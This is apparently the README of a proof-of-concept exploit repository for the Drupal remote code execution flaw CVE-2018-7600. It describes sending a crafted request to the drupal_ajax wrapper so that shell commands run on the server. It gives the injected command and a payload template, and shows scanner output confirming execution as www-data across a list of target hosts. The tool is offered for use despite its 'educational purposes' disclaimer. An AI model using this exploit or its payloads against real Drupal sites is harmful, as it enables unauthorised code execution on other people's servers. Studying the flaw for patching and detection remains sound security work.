Proof-of-Concept for Drupal CVE-2018-7600 / SA-CORE-2018-002# Proof-Of-Concept for [CVE-2018-7600 / SA-CORE-2018-002](https://cve.circl.lu/cve/CVE-2018-7600) [](https://codebeat.co/projects/github-com-thehappydinoa-cve-2018-7600-main)
Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.
## How it works
1. It sends a packet to the `drupal_ajax` wrapper to register a user. Allows user to use the `exec` markup and run bash. This PoC sends a the user name and id to abcde.txt.
```bash
echo Name: $(id -un) UID: $(id -u) Groups: $(id -Gn) | tee abcde.txt
```
2. Checks `http*://example.com/abcde.txt`
```bash
[!] PROVIDED ONLY FOR EDUCATIONAL OR INFORMATION PURPOSES.
[?] Enter file name (example: /root/file/hosts.txt): hosts.txt
[+] https://example.com/ Possibly exploitable
[~] Checking... https://example.com/abcde.text
[+] https://example.com/ Exploitable
[+] UID: 33 Name: www-data
[+] Deleting... https://example.com/abcde.text
```
## Payloads
%s = file name
User ID, PID, and Group Payload
```bash
echo Name: $(id -un) UID: $(id -u) Groups: $(id -Gn) | tee %s
```
## Thanks to
- Thanks to [Vitalii Rudnykh](https://github.com/a2u)
## Provided only for educational or information purposes.
[4.0K] /data/pocs/1603107e2cc126160ee68195a47f64fd6c878bff
├── [5.7K] exploiter.py
├── [ 20] hosts.txt
├── [1.0K] LICENSE
├── [ 180] notes.md
├── [1.4K] README.md
├── [ 17] requirements.txt
└── [ 60] todo.md
0 directories, 7 files